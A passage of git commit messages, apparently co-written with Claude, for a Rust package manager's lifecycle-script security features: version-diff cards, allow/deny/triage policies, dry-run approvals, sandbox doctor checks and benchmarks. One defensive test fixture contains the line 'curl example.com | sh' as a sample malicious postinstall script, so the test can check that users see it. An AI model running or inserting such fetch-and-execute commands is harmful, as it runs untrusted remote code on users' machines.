  thin wrapper that calls the shared helper. All four call sites
  (`print_listing`, `print_summary` × 4 paths) thread `&trusted`.
- Both install.rs sites (`run_with_options` + the lockfile fast-path)
  call the shared helper directly. They read `&trusted` from the
  manifest via the C2 `read_trusted_deps_from_manifest` helper —
  graceful degradation: when the manifest is missing/malformed,
  `unwrap_or_default()` produces an empty Legacy variant and every
  entry's `version_diff` is `null` (which is what an empty
  `trustedDependencies` should produce anyway).

Future schema additions to the per-entry shape (P8's `approved_by`
on the binding will surface here) edit ONE site instead of three.

## print_summary signature change

`fn print_summary(... &trusted, ...)` — adds a `&TrustedDependencies`
parameter so the per-entry helper can compute version_diff for the
approved/skipped lists in --yes/interactive output. Note: this fires
post-`write_back`, so `trusted` includes the freshly-added binding
for `name@candidate_version`. The `latest_binding_for_name` selector
is strictly-less-than the candidate, so it skips the freshly-added
entry and reports the diff against the prior version — matches what
the user saw when reviewing. Documented at the call site.

## SCHEMA_VERSION bump 2 → 3

The `SCHEMA_VERSION` constant in approve_builds.rs documents the
v3 addition + the bump rule. New `schema_version_bumped_for_version_diff`
const-assert pins the bump so a future revert can't silently
downgrade the version. Pre-v3 readers ignore the new field; v3+
readers branch on `schema_version >= 3` to know when to expect it.

The two existing CLI subprocess tests in
`approve_builds_audit_regression.rs` that assert `schema_version ==
Some(2)` are updated to `Some(3)` with a comment naming both bumps
(P2 Chunk 3 → 2, P7 Chunk 4 → 3) so future readers know the
history.

## Tests

15 new unit tests in `version_diff::tests`:
- Wire-form pinning: `version_diff_reason_wire_strings_are_kebab_case`,
  `provenance_drift_kind_wire_strings_are_kebab_case` — agents grep
  on these strings, so changing them is a wire break.
- Per-variant JSON shape: `version_diff_to_json_no_change_*`,
  `_script_hash_drift_alone`, `_behavioral_tag_shift_emits_arrays`,
  `_behavioral_tag_shift_only_gained_still_emits_empty_lost`,
  `_provenance_dropped`, `_provenance_identity_changed`,
  `_provenance_gained`, `_multi_field_emits_each_dimension`,
  `_multi_field_with_only_some_dimensions_nulls_others`.
- `blocked_to_json` integration: emits `null` when no prior binding;
  emits `no-change` object when prior matches; emits full diff when
  prior drifts.

Plus `schema_version_bumped_for_version_diff` const-assert.

## Local gate (touched crates)

```
cargo clippy -p lpm-workspace -p lpm-cli --all-targets -- -D warnings
# clean

cargo fmt --check
# clean

cargo test -p lpm-workspace -p lpm-cli
# 88 + 1573 + 78 = 1739 passed; 0 failed

cargo test -p lpm-security -p lpm-global -p lpm-resolver
# 657 passed; 0 failed (binding consumers unaffected)
```

End-to-end JSON shape proof under a real subprocess comes in C5's
reference fixture.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…both ship criteria

C5 lands the §11 P7 ship-criteria gate at the CLI level: end-to-end
subprocess proofs that both ship criteria fire under real fd
separation, real LpmRoot resolution, and the real
store/manifest/build-state read pipeline. Mirrors the P6 Chunk 5
reference-fixture pattern so future readers have one mental model
for "Phase 46 P-N reference fixture."

## Why approve-builds path (not install)

The C2 install render path can't be exercised end-to-end without a
real `lpm install` run (lockfile-validated integrity against a real
registry — same blocker the P6 fixture commentary documents). The
diff-rendering CONTRACT is identical between the install
pre-autobuild card and the approve-builds TUI card (both call
`render_preflight_card`); the C5 fixture exercises the contract
through `lpm approve-builds --list` (human + JSON). A passing
assertion on the approve-builds output proves the install path's
rendering at the exact byte level.

Pure-decision proofs of both ship criteria already exist:
- `version_diff::tests::preflight_card_*` (C2) — pure renderer.
- `commands::install::tests::p7_post_install_hints_*` (C2) —
  install enrichment decision.

C5 is the missing end-to-end subprocess proof: real binary, real
fd separation, real LpmRoot.

## Tests (6 added)

**Ship criterion 1 — script_hash drift surfaces the exact added line:**
- `p7_chunk5_script_hash_drift_surfaces_added_curl_pipe_in_approve_builds_list`
  Seeds shapeshift@1.0.0 (`echo hi`) + shapeshift@2.0.0
  (`echo hi\ncurl example.com | sh`). Approves v1's script_hash in
  trustedDependencies. Synthesizes build-state.json with v2 blocked
  + a different script_hash. Runs `lpm approve-builds --list` as a
  subprocess, asserts the diff card header (`shapeshift@2.0.0 —
  changes since v1.0.0:`) AND the literal `+curl example.com | sh`
  line surface in stdout. The literal-line assertion IS the ship
  criterion: the user sees the malicious line verbatim, not just
  "scripts changed."
- `p7_chunk5_script_hash_drift_emits_structured_version_diff_in_json`
  Same scenario, runs `--json`, asserts:
  - `schema_version: 3` (P7 Chunk 4 bump).
  - `version_diff.reason: "script-hash-drift"`.
  - `prior_version: "1.0.0"`, `candidate_version: "2.0.0"`.
  - `script_hash_drift: true`, other dimension fields null.

**Ship criterion 2 — behavioral_tag delta surfaces gained tags:**
- `p7_chunk5_behavioral_tag_drift_surfaces_gained_network_and_eval_in_card`
  Same script body on both sides (no script drift to mask the tag
  drift). Prior had only `crypto`; candidate has `crypto + eval +
  network`. Asserts `+ eval` and `+ network` both appear verbatim
  in the diff card. Negative pin: NO "Script content changed"
  header (the script bodies match, so a regression that emitted a
  spurious script section would fail this assertion).
- `p7_chunk5_behavioral_tag_drift_emits_gained_arrays_in_json`
  Same scenario with `--json`. Asserts:
  - `version_diff.reason: "behavioral-tag-shift"`.
  - `behavioral_tags_added: ["eval", "network"]` (sorted lex per
    `active_tag_names()`).
  - `behavioral_tags_removed: []` (NOT null — pins the C4 wire-
    shape distinction between "tag dimension drifted with no
    losses" (`[]`) and "tag dimension didn't drift" (`null`)).

**Stream-separation control:**
- `p7_chunk5_list_json_stays_parseable_with_version_diff_enrichment`
  Pins that stdout under `--json` is exactly one parseable JSON
  document, even when `version_diff` enrichment fires. If a
  regression accidentally routed `print_version_diff_card_for_blocked`'s
  `println!` through stdout in JSON mode, this parse fails with the
  offending shape printed for diagnosis. Mirrors the P6 Chunk 5
  stream-separation pin shape.

**No-prior-binding control:**
- `p7_chunk5_first_time_review_emits_null_version_diff_and_no_card`
  First-time review (no prior binding for the same package name)
  must NOT render a diff card and must emit `version_diff: null` in
  JSON. Pins the C1 contract that `latest_binding_for_name` returns
  None in this case, surfaced through both UX paths.

## Harness

Reuses the P6 Chunk 5 shape:
- `run_lpm` with `LPM_HOME` + `HOME` overrides isolating the test
  to a tempdir; `NO_COLOR` + `LPM_NO_UPDATE_CHECK` +
  `LPM_DISABLE_TELEMETRY` for deterministic output.
- `seed_package` writes synthetic store entries; uses
  `serde_json::Value::String` for postinstall-body JSON-escaping
  so multi-line bodies (the scenario A v2 case) escape correctly.
- New helpers (P7-specific):
  - `write_blocked_build_state` synthesizes a
    `<project>/.lpm/build-state.json` with one blocked entry,
    optional `behavioral_tags{,_hash}` fields. Stand-in for the
    install pipeline's capture writer (which the harness can't
    drive).
  - `write_project_with_prior_binding` writes a `package.json`
    with a `trustedDependencies` rich entry for the prior version,
    using the on-disk wire shape (`scriptHash`, `behavioralTagsHash`,
    `behavioralTags`) per `lpm-workspace::TrustedDependencyBinding`'s
    serde renames.

## Local gate (touched crates)

```
cargo clippy -p lpm-workspace -p lpm-cli --all-targets -- -D warnings
# clean

cargo fmt --check
# clean

cargo test -p lpm-cli --test p7_version_diff_reference
# 6 passed; 0 failed (real subprocess runs in ~1.9s)

cargo test -p lpm-cli -p lpm-workspace
# 1657 passed; 0 failed across 11 test binaries (88 + 1573 + 84
# in test bins including the 6 new in p7_version_diff_reference)
```

Full workspace gate deferred to C6.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
§5.1 specifies allow as "runs every lifecycle script without the
triage gate." Pre-fix, `build::run`'s default-branch selector
filtered `to_build` to `is_trusted`-only at build.rs:254 regardless
of policy, so allow behaved identically to deny at the CLI boundary
— a P1-era gap flagged by v2.8 item 6. The P6 Chunk 2 helper-level
test (p6_chunk2_allow_does_not_promote_green_tier_at_helper_level)
pinned that `evaluate_trust` stays single-purpose by design; the
caller-side half of that split had no guard.

Bug-first test landed first (confirmed pre-fix red: 2/4 subprocess
tests failed), fix extracts `widen_to_build_by_policy` as a pure
helper so both the caller contract (Allow widens, Deny/Triage
filter) and the `--all` escape-hatch override are independently
unit-testable.

Changes:

- `widen_to_build_by_policy(scriptable, all, effective_policy)` —
  pure helper encapsulating the default-branch widening rule:
  `all || policy == Allow` → every scriptable package; else →
  filter to `is_trusted`. Triage's green-only promotion stays
  gated at `evaluate_trust` (P6 Chunk 2 contract preserved).
- `build::run` default branch delegates to the helper. Specific-
  package path (with its warn-on-missing side effect) stays inline.
- Both skipped-count warning sites gain `effective_policy != Allow`
  guards — "will be skipped" + trustedDependencies pointer is
  misdirection under allow because the widening folds every
  scripted package into the build set.

Tests (bug-first, confirmed red pre-fix, green post-fix):

- 4 subprocess tests in `p46_close_allow_widening_reference.rs`:
  project-manifest allow widens every tier; CLI override
  (`--policy=allow` + `--yolo` alias) also widens; deny keeps
  trusted-only filter + legacy pointer; triage does NOT widen
  beyond `evaluate_trust`-promoted greens (pins the allow-scoped
  boundary of the fix).
- 4 pure-function unit tests next to the P6 helper guards:
  Allow includes untrusted; Deny filters to trusted; Triage
  filters to trusted (green promotion was already applied by
  the time scriptable_packages reached the helper); `--all`
  widens under every policy.

Gates passing:
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_allow_widening_reference: 4/4 pass
- commands::build::tests: 49/49 pass (4 new + 45 pre-existing;
  includes all P6 Chunk 1/2/3 tests)
- p6_triage_autoexec_reference: 5/5 pass (no regression)
- p7_version_diff_reference: 6/6 pass (no regression)

Install auto-build path composes correctly: install.rs calls
build::run with `all=false` and a resolved `effective_policy`;
under `scriptPolicy=allow + autoBuild=true`, the new helper widens
to every scripted package, matching §5.1's autoBuild+allow row.

Closes §5.1's "Partially shipped as of P6 (v2.8)" — flip to fully
shipped happens in the Chunk 6 plan-doc close-out pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Reviewer flagged during Chunk 2 signoff that the shipped behavior no
longer matched the --help text in `lpm install` and `lpm build`:

- `--policy` (both commands) said "all three values currently behave
  identically to --policy=deny" — stale since P6 shipped tier-aware
  auto-execution for triage and Chunk 2 shipped allow-widening for
  `lpm build`.
- `--yolo` said "currently a no-op that only logs the chosen policy"
  — stale since Chunk 2.
- `--triage` said "currently a no-op" — stale since P6.

After this chunk's selection-step widening, `build --policy=allow` /
`--yolo` change execution selection, and `install` with
`autoBuild=true` inherits that through `build::run`. The help text
was user-visible contract drift on the binary's own --help output.

Rewrites both sites to describe shipped behavior:

- install --policy: enumerates deny/allow/triage with current
  semantics, names the two-phase invariant (install never runs
  scripts; policy governs auto-build + subsequent `lpm build`),
  notes Layer 4 (LLM triage) ships in 46.1.
- install --yolo: alias for --policy=allow, auto-build + `lpm build`
  run every scripted package without tier gating.
- install --triage: alias for --policy=triage, tiered gate with
  greens auto-approved in sandbox.
- build --policy: enumerates deny/allow/triage at the selection
  step specifically; notes `--all` overrides every policy.
- build --yolo: includes every scripted package regardless of trust;
  equivalent to `--all` at the selection step.
- build --triage: greens auto-promoted into the build set.

Bullet lists use blank-line paragraph breaks (`///` between each)
so clap's help reformatter renders them as paragraphs, not a
run-on line. Confirmed by inspecting
`lpm install --help` / `lpm build --help` output post-rebuild.

Gates passing:
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_allow_widening_reference: 4/4 pass (no regression)

Doc-only change; no behavior change.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Preview decisions without mutating persisted state. §11 P9 close-out
scope item per v2.10. Covers project + global surfaces explicitly per
the Chunk 3 signoff — project-mode byte-equality of `package.json`
alone would have missed the `--global` aggregate path.

## Surface

New `--dry-run` flag on `lpm approve-builds`. Combines with `--yes`,
`<pkg>`, the interactive walk, and with `--global` / `--json`. No-op
when combined with `--list` (already read-only — accepted silently
per signoff). JSON envelopes carry `"dry_run": true` so agents can
distinguish preview from live runs at parse time; human output
reframes "X approved" as "would approve X — no changes written" and
drops the `lpm build` next-step pointer.

## Mutation-site map

Project mode (`run`) — 3 write_back call sites:
- Line 289 (direct <pkg> approve, after confirm)
- Line 372 (--yes bulk)
- Line 547 (interactive walk, post-loop atomic write)

Global mode — 5 write_for call sites across 3 helpers:
- run_global_bulk_yes — 1 site (bulk aggregate write)
- run_global_named — 1 site
- run_global_interactive — 3 sites (grouped approve-all, grouped per-row,
  non-grouped per-row)

Every site gains `if !dry_run { … }` around the mutation. Decision
accounting (approved / skipped vectors) still populates so the
summary surfaces the would-approve counts identically to a live run.

## Signature changes

- `run(project_dir, package, yes, list, dry_run, json_output)` —
  new `dry_run` bool between `list` and `json_output`.
- `run_global(package, yes, list, group, dry_run, json_output)` —
  new `dry_run` bool.
- Internal helpers (`run_global_bulk_yes`, `run_global_named`,
  `run_global_interactive`) gain matching `dry_run` parameter.
- `print_summary` gains `dry_run` bool before `json_output`;
  `#[allow(clippy::too_many_arguments)]` added with rationale
  (wrapper struct would hurt readability more than 8 positional
  args; fold only if a second command-level surface starts
  consuming the same shape).

14 internal test-module call sites updated to pass `false` for the
new `dry_run` slot.

## Tests (6 new subprocess tests)

`crates/lpm-cli/tests/p46_close_dry_run_reference.rs`:

1. Project `--yes --dry-run --json`: `package.json` byte-equal
   before/after; JSON has `"dry_run": true`; warning message
   reframed as "DRY RUN — would blanket-approve…".
2. Project `<pkg> --dry-run --json`: `package.json` byte-equal;
   JSON has `"dry_run": true`.
3. Project `--list --dry-run`: silent no-op — succeeds, no mutation.
4. Global `--yes --global --dry-run --json`: trust file stays
   ABSENT on fresh fixture; JSON envelope has `"dry_run": true`,
   `"scope": "global"`, warning reframed.
5. Global `<pkg>@<ver> --global --dry-run --json`: trust file
   stays absent; matched package identity surfaces in `approved`
   array for agent visibility.
6. Global `<pkg> --dry-run` against pre-seeded trust file:
   byte-equal preserved — proves the short-circuit protects
   existing state as well as fresh.

Fixture shapes for global mode hand-write `manifest.toml` (one
top-level install) + per-install `build-state.json` (one blocked
package). Matches the on-disk shape `lpm_global::write_for`
produces.

## Legacy-upgrade warning suppressed under dry-run

`print_summary`'s JSON `"legacy_upgraded_to_rich"` warning fires
when a legacy array-form `trustedDependencies` would have been
rewritten as the rich map form. Under `--dry-run`, no write
happens — the legacy array stays on disk. Surfacing "upgraded"
would lie, so the warning suppresses. Live-run behavior unchanged.

## Gates

- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_dry_run_reference: 6/6
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)
- approve_builds::tests (unit): 73/73
- approve_builds_audit_regression: 6/6 (no regression)

106 total tests across the Phase 46 + approve-builds surface, green.

## Non-goals

- Interactive walk subprocess tests. Both project and global
  interactive paths require a TTY; subprocess harness can't
  provide one. Source-level audit of the 3 write sites inside
  `run_global_interactive` + existing `approve_builds_yes_*`
  unit-test coverage + the human-output DRY RUN messaging
  together pin the contract.
- Empty-aggregate and --list JSON envelopes do NOT carry
  `dry_run`. Those paths are structurally read-only; adding
  the field would tell agents something redundant. Principle
  of least surprise: passing a redundant flag shouldn't change
  the output schema.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Reviewer flagged during Chunk 3 signoff that the help text + command-
level doc comments promised "JSON envelopes carry \`\"dry_run\": true\`
so agents can detect the mode" — but `--list` paths and empty-set
short-circuits emitted envelopes without the field. An agent
invoking `approve-builds --list --dry-run --json` or
`approve-builds --dry-run --json` on an empty set couldn't detect
dry-run from the envelope, contrary to the stated contract.

Picked Option 2 from the reviewer's two paths: make the
implementation universal rather than narrow the help text. Agents
read `envelope.dry_run` without branching on mode; schema stays
uniform across every approve-builds JSON surface.

Sites updated (four emission points that produce JSON envelopes):

- `run()` empty-set short-circuit at approve_builds.rs — inline
  `serde_json::json!` literal gains `"dry_run": dry_run`.
- `print_listing()` — gains `dry_run: bool` parameter, threaded
  from `run()`'s caller. Envelope gains the field.
- `run_global()` empty-aggregate short-circuit — gains
  `"dry_run": dry_run`.
- `print_global_list()` — gains `dry_run: bool` parameter, threaded
  from `run_global()`'s caller. Envelope gains the field.

One unit test updated: `print_global_list_handles_empty_aggregate_without_panicking`
now exercises the new parameter axis in its smoke-test shape.

## Tests (2 new subprocess + 1 upgraded)

- `p46_close_chunk3_project_list_dry_run_is_silent_no_op` upgraded:
  was exit-code-and-byte-equal-only; now also asserts
  `dry_run: false` on plain `--list --json` (baseline) and
  `dry_run: true` on `--list --dry-run --json`, proving the
  universal contract on the read-only path.
- `p46_close_chunk3_project_empty_blocked_set_json_carries_dry_run_flag`:
  exercises the empty-set short-circuit (both `--yes` and
  `--yes --dry-run` paths emit the flag).
- `p46_close_chunk3_global_list_json_carries_dry_run_flag_on_both_axes`:
  mirror for the global `--list` envelope via `print_global_list`.

## Gates

- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_dry_run_reference: 8/8 (was 6/6 pre-fix)
- approve_builds::tests (unit): 73/73 (no regression)
- approve_builds_audit_regression: 6/6 (no regression)
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)

102 tests across the approve-builds + Phase 46 surface — one
uniform contract for agents.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…e boundary

§11 P9 close-out scope item per v2.10. Surfaces the 46.0 platform
boundaries through the existing doctor harness so users see the
sandbox-availability status and the project-only scope limit
alongside other infrastructure checks.

## New checks

### 18. Sandbox availability probe (`Sandbox`)

Constructs a synthetic SandboxSpec and calls
`lpm_sandbox::new_for_platform(spec, SandboxMode::Enforce)`. Both
backends' `new()` are memory-only (macOS Seatbelt renders an
in-memory profile string; Linux landlock does one benign
ruleset-create syscall to probe ABI), so the check costs nothing
in persistent I/O and never races with running installs.

Outcome map:
- macOS / Linux (kernel >= 5.13) → `pass` — backend name + platform
  in detail (e.g., "seatbelt available on macos — lifecycle scripts
  run under Enforce mode")
- Windows → `warn` with the §17.4 Phase 46.1 deferral pointer.
  Scripts still run today via `--unsafe-full-env --no-sandbox`, but
  `script-policy = "triage"` / `"allow"` opts out of the sandbox
  floor on Windows until 46.1 — users need to know.
- Linux with kernel < 5.13 → `warn` with kernel version +
  landlock requirement + upgrade remediation.
- Unexpected errors → `fail` with diagnostic detail. Shouldn't
  happen; the synthetic spec is well-formed.

### 19. Scope-boundary note (`Script policy scope`)

Informational `pass` surfaced iff the global manifest carries at
least one active install. The 46.0 script-policy surface covers
project installs only; `lpm install -g` uses a separate Phase 37
trust store that 46.1 brings into the tiered-gate + sandbox fold
per D19. Users without global installs don't see the note
(avoids noise); users with globals see the forward pointer so
the capability gap is explicit, not latent.

## Wiring

Placed after the global-installs block (checks #14-17) in
`doctor::run`, so the scope-boundary note sits visually next to
the Phase 37 rows it contextualizes. Follows the existing
`check_global_installs() -> Vec<Check>` aggregator pattern:
`check_script_policy_surface() -> Vec<Check>` composes
`probe_sandbox_backend()` (unconditional) + a conditional
`scope_boundary_note_if_globals_present(root)` (only on
non-empty globals).

Split into three functions so each is independently testable
without running the whole `doctor::run` pipeline — matches how
the P6 close-out helpers were extracted.

## Tests (5 new unit tests in commands::doctor::tests)

- `sandbox_probe_always_returns_a_check`: universal smoke — the
  probe must never panic, always emits a named `Check` with a
  non-empty detail line regardless of platform.
- `sandbox_probe_on_macos_passes_with_seatbelt_backend`
  (`#[cfg(target_os = "macos")]`): macOS runners must Pass and
  the detail must name `seatbelt` for user debuggability.
- `sandbox_probe_on_linux_passes_or_warns_never_fails`
  (`#[cfg(target_os = "linux")]`): Linux must be Pass (landlock
  present) or Warn (kernel too old), never Fail. CI runners with
  recent kernels hit the Pass arm; older boxes would hit Warn
  but the test passes either way — the contract is "no Fail on
  a supported platform."
- `sandbox_probe_on_windows_warns_with_phase_46_1_pointer`
  (`#[cfg(target_os = "windows")]`): Windows must Warn with the
  §17.4 46.1 message present in the detail.
- `scope_boundary_note_is_absent_when_no_global_installs`:
  fresh synthetic `LpmRoot` returns None.
- `scope_boundary_note_fires_when_global_installs_exist`:
  seeded `manifest.toml` with one active install returns
  Some(Check), with "Phase 46.1" and "project installs only"
  in the detail.
- `check_script_policy_surface_always_includes_sandbox_probe`:
  aggregator contract — sandbox probe always first, so a
  future refactor can't accidentally gate it behind a
  globals-exist check.

Per CLAUDE.md cross-platform rules: Linux + Windows test bodies
are `#[cfg]`-gated so they don't compile as dead code on the
other platforms' CI runners. macOS CI runs 5 tests (universal +
macOS-gated + 3 universal scope/aggregator); Linux runs 5
(universal + Linux-gated + 3); Windows runs 5 (universal +
Windows-gated + 3).

## Gates

- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- commands::doctor::tests: 70/70 (65 pre-existing + 5 new
  active on macOS)
- p46_close_dry_run_reference: 8/8 (no regression)
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)

Verified live `lpm doctor` output on developer machine (macOS
with global installs):

  ✔ Sandbox    seatbelt available on macos — lifecycle scripts run under Enforce mode
  ✔ Script policy scope    project installs only — global installs use a separate trust store at ~/.lpm/global/trusted-dependencies.json; Phase 46.1 extends the tiered gate + sandbox containment to globals

## Non-goals (deferred to 46.1 per v2.10 P9 trim)

- LLM detection doctor entry. Pairs with P8 Layer 4.
- Triage / policy config validation check (flagging typos in
  `package.json > lpm > scriptPolicy`). The install-time warning
  path at main.rs already surfaces typos; a second doctor-level
  check would be redundant until the user actually runs the
  command. Queue if users report hitting the gap.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…line snapshot

§11 P9 close-out scope item per v2.10. Two separate pieces per the
Chunk 5 signoff — wall-clock benchmarking on the 51-pkg fixture,
subprocess golden snapshot on a 2-pkg deterministic fixture.

## bench_cold_install_triage (bench/run.sh)

Reuses the existing 51-pkg fixture (17 direct deps resolving to 51
packages). Two axes against the deny baseline, matching amended
§12.7:

- Axis 1 (autoBuild off) — classification-only overhead. Measures
  P1 metadata plumbing + P2 static-gate classification cost during
  install timeline, scripts dormant. Target: ≤5% regression vs
  deny on the same fixture.
- Axis 2 (autoBuild on) — execution-path overhead. Measures P5
  sandbox spawn + P6 tier-aware auto-execution on green-classified
  scripted packages. Target: ≤15% regression vs deny on the same
  fixture.

Uses the existing `median_ms_ab_with_setup` helper with alternating
A/B run order per iteration so CDN / kernel-cache state can't
bias a single arm. Output includes a per-axis delta with the
target threshold inline for eyeball triage.

`format_delta` helper added for the percentage math (integer
bash arithmetic to whole-percent granularity — sufficient signal
at the wall-clock variance install benches show). Smoke-tested
in isolation: 100→105 = 5%, 100→120 = 20%, 100→95 = -5%, 0→100 =
"baseline 0ms — cannot compute delta" guard.

Wired into dispatch + `all` group + usage message. The
`workflow_dispatch` bench job in CI picks up the new arm
automatically via the `all` expansion.

v2.10 §0 item 3 documented why this reframes the original
"≤5% on no-scripts case, ≤15% on scripts case" gate — a
postinstall-free fixture produces a vacuous zero-by-construction
delta, so the honest measurement is the two-axis split on a
realistic fixture.

## Deterministic baseline snapshot (lpm-cli/tests/p46_close_policy_deny_baseline.rs)

The §18 "zero-regression guarantee for the default" contract
transposed onto a subprocess-driven byte-equal golden:

- 2-pkg synthetic fixture: trusted-pkg (legacy bare-name entry
  in package.json > lpm > trustedDependencies) + untrusted-pkg
  (no binding). Under --policy=deny, the default-branch filter
  includes the trusted one and drops the untrusted one.
- `lpm build --dry-run --policy=deny --json` on this fixture
  produces deterministic stdout because serde_json's
  preserve_order feature is on workspace-wide + the one-script
  shape avoids HashMap iteration nondeterminism.
- Golden committed at
  `tests/fixtures/p46_close_policy_deny_baseline.stdout` (13
  lines). Any drift — intentional schema evolution or
  accidental regression — forces the developer to touch this
  file and decide. Re-capture with `UPDATE_GOLDEN=1`.

Why `lpm build --dry-run` and not `lpm install` directly: real
install against a synthetic fixture needs network or wiremock,
both out of 46.0 close-out scope (v2.9 residual gap). The
dry-run JSON output is a direct function of the post-install
persisted state, and under deny its shape is the pre-Phase-46
contract verbatim — sufficient for the zero-regression
guarantee. The test module's doc comment spells this out for
future readers.

Two tests:
- `p46_close_chunk5_policy_deny_dry_run_json_matches_golden` —
  byte-equal assertion. Manually verified by mutating the
  golden ("echo hi" → "echo drift") pre-commit: test failed
  with a clear diff pointing at the drifted line + the
  UPDATE_GOLDEN recovery command. Then restored.
- `p46_close_chunk5_policy_deny_dry_run_json_stdout_is_clean_json` —
  stream-separation sanity: stdout parseable, single package,
  trusted flag present. Pairs with the golden to catch stream
  bleed.

## Scope decisions

- Golden captures stdout only. Stderr contains ANSI + cliclack
  formatting that varies across terminal widths and versions;
  byte-equal on stderr would flake.
- Fixture uses `lpm build`, not `lpm install`. Documented
  rationale in the test module's doc comment (network vs
  wiremock scope).
- Bench is manual-trigger only (CI's `bench: workflow_dispatch`
  job). Not gating PR merges; purely a measurement tool.

## Gates

- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- bash -n bench/run.sh (clean)
- p46_close_policy_deny_baseline: 2/2
- p46_close_dry_run_reference: 8/8 (no regression)
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)
- Bench dispatch smoke: `./bench/run.sh cold-install-triage`
  appears in the "Available:" list and routes correctly.

## Non-goals

- Running the full bench for real in this commit. Real
  cold-install takes network + ~60-90s for 2 axes × 3 runs ×
  2 arms. The bench job runs on workflow_dispatch only; this
  commit ships the harness, not the measurement. When the
  release manager cuts 46.0 they'll run the bench manually
  to confirm the ≤5% / ≤15% gates hold on the reference
  machine and record the baseline in `bench/baselines/`.
- Snapshot on `lpm install` directly. Requires wiremock or
  real network — explicitly deferred per v2.9 residual gap.
- Multi-package script-hash drift regression tests. Covered
  by P6/P7 reference fixtures at a different granularity.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…erhead

Reviewer flagged during Chunk 5 signoff that the original wording
over-claimed. Axis 2 was labeled "execution-path overhead" for P5
sandbox spawn + P6 tier auto-execution, but on the current 51-pkg
bench fixture no packages have `preinstall` / `install` /
`postinstall` scripts — `EXECUTED_INSTALL_PHASES` at
crates/lpm-security/src/lib.rs:70 is exactly those three phases,
and the pure-JS fixture (zod, dayjs, lodash, etc.) uses only
`prepare` / `prepublishOnly` which are not in LPM's executed set.

So the autoBuild=on arm walks install → should_auto_build →
build::run → `evaluate_trust` per package → empty scriptable
set → early return. That's a measurable control-path walk, but
the sandbox never spawns and P6 auto-execution never fires. The
original "≤15% execution-path overhead" target was unsound as
stated on this fixture.

Picking Option 2 from the reviewer's two natural next steps
(relabel + defer true-execution bench, rather than curate a
script-bearing fixture now). Fixture curation is a separate
workstream: pinning a green-classified preinstall/install/
postinstall package whose own script duration doesn't dominate
the sandbox spawn cost, keeping it reproducible across time,
deciding which package class is representative, etc. — genuine
design work that doesn't fit a close-out chunk scope.

## Bench changes

- Axis 2 relabeled: "auto-build CONTROL-PATH overhead (autoBuild
  on)" — not "execution-path overhead."
- Axis 2 target: ≤5% (same as Axis 1), matching what a
  control-path walk realistically costs; the ≤15% was premised
  on sandbox spawn ~10ms/script overhead that doesn't apply here.
- Header comment gains a ⚠ block pointing at
  EXECUTED_INSTALL_PHASES, naming the missing script classes in
  the fixture, and stating the deferral.
- Per-run output line gains a `note:` follow-up clarifying
  "control-path only (no scripts in fixture); execution-path
  bench deferred."

## Plan-doc follow-up

§0 v2.11 on `phase-46-p4-server-side` of `a-package-manager`
documents the audit + narrows §12.7's Axis 2 claim to match.
Landing separately; both commits together complete the
corrected Chunk 5.

## Gates (no code change behind the relabel)

- bash -n bench/run.sh (clean)
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- All Phase 46 regression suites: 25/25 (no semantic change)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The bench harness hardcoded `$BENCH_DIR/.work` (inside the repo),
which lives under a VS-Code-watched tree. Every `cold-install-clean`
iteration writes ~25 MB / thousands of files into `node_modules/`,
triggering FSEvents → VS Code's file-watcher → `@vscode/ripgrep`
scans with `--no-ignore --follow` (which bypasses the `.gitignore`
exclusion of `bench/.work`). The rg workers spawn faster than they
reap, accumulate, and eventually saturate the macOS `-u`
(processes) ulimit (~2666 on Apple Silicon). At saturation, new
forks — DNS helpers, tokio worker threads, anything — stall with
`resource temporarily unavailable`, and the whole machine looks
frozen while benches run. This was diagnosed during the 46.0
tag-cut A/B cross-binary validation on 2026-04-23.

Two small env knobs pull the harness out of the watched tree:

- `BENCH_WORK_DIR` — redirects the per-iter scratch path; default
  `$BENCH_DIR/.work` preserved for CI compat.
- `BENCH_PROJECT_DIR` — redirects the fixture `package.json`
  source; default `$BENCH_DIR/project` preserved.

Example: the 46.0 A/B across a larger fixture runs with
  BENCH_WORK_DIR=/tmp/lpm-bench BENCH_PROJECT_DIR=/tmp/lpm-large-fixture \
    ./bench/run.sh cold-install-clean

No binary / logic change — pure harness path ergonomics. Preserves
all existing bench invocations bit-for-bit.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
The helper `build_blocked_set_metadata` in install.rs previously
walked `for p in packages` and `.await`ed `get_package_metadata`
(resolver TTL cache lookup) + `fetch_provenance_snapshot`
(attestation fetch, cache-first) **serially per package**. Even
with both caches warm, that's two async boundary crossings per
package — ~3 ms of overhead each — which stacks linearly with the
resolved dep count.

Measured on a 277-package fixture during the 46.0 tag-cut A/B
cross-binary validation on 2026-04-23 (main vs phase-46 under
`--policy=deny`, same fixture, order-alternated to cancel CF edge
